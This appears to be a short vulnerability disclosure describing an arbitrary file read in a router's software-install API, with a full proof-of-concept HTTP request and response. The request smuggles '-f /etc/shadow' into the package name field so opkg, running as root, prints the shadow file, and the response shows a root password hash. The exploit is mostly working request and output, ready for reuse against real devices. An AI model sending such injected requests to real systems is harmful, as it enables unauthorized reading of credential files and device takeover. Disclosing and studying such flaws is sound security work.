Arbitrary File Read
Through the software installation feature, it is possible to inject arbitrary parameters in the request so as to exploit opkg to read arbitrary file name using root privileges, using it functionality to specify with -f a configuration file.
Proof of Concept:
Request
POST /cgi-bin/api/software/install HTTP/1.1
Host: 192.168.8.1
Content-Length: 25
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: ce0fc001ff684088a83257360de4bb44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
Connection: close
name=a%20-f%20/etc/shadow
Response
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 804
Connection: close
Date: Sun, 19 Mar 2023 08:25:52 GMT
Server: lighttpd/1.4.48
{"code":-13,"stderr":"Collected errors:\n * opkg_conf_parse_file: \/etc\/shadow:1: Ignoring invalid line: `root:$1$lchqx22V$LOxNwv3ggvnFw\/kIyD2eB0:19256:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:2: Ignoring invalid line: `daemon:*:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:3: Ignoring invalid line: `ftp:*:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:4: Ignoring invalid line: `network:*:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:5: Ignoring invalid line: `nobody:*:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:6: Ignoring invalid line: `dnsmasq:x:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:7: Ignoring invalid line: `stubby:x:0:0:99999:7:::'\n * opkg_install_cmd: Cannot install package a.\n","stdout":"Unknown package 'a'.\n"}